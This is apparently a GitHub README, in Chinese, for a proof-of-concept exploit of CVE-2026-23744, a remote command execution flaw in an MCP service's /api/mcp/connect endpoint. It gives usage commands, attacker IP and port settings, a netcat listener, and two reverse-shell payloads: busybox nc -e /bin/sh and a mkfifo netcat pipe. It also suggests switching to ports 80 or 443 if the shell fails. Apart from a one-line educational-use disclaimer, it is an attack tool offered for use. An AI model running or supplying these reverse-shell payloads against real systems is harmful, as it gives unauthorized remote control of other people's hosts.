H1sok444/CVE-2026-23744-PoC
GitHub: H1sok444/CVE-2026-23744-PoC
针对 CVE-2026-23744 MCP 服务远程命令执行漏洞的概念验证脚本,可通过反向 shell 获取目标主机访问权限。
Stars: 0 | Forks: 0
# CVE-2026-23744-PoC
# MCP RCE Exploit (Linux)
利用 `/api/mcp/connect` 实现远程命令执行的 PoC。
## 环境要求
```
pip install requests
```
## 使用方法
```
python3 exploit.py
```
示例:
```
python3 exploit.py mcp.something.com
```
## 配置 (在脚本中编辑)
```
attacker_ip = "YOUR_IP"
port = 4444
```
## 监听器
```
nc -lvnp 4444
```
## Payload
默认:
```
busybox nc -e /bin/sh
```
备选:
```
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | busybox nc > /tmp/f
```
## 注意事项
* 如果没有 shell,请尝试端口 80/443
* 如果 `-e` 失败,请使用备选方案
## 免责声明
仅供教育用途。
标签:API安全, Busybox, CISA项目, CVE-2026-23744, Exploit, JSON输出, MCP, Netcat, PoC, Python, RCE, 攻击脚本, 无后门, 暴力破解, 概念验证, 渗透工具, 漏洞复现, 编程工具, 网络安全, 远程代码执行, 逆向Shell, 逆向工具, 隐私保护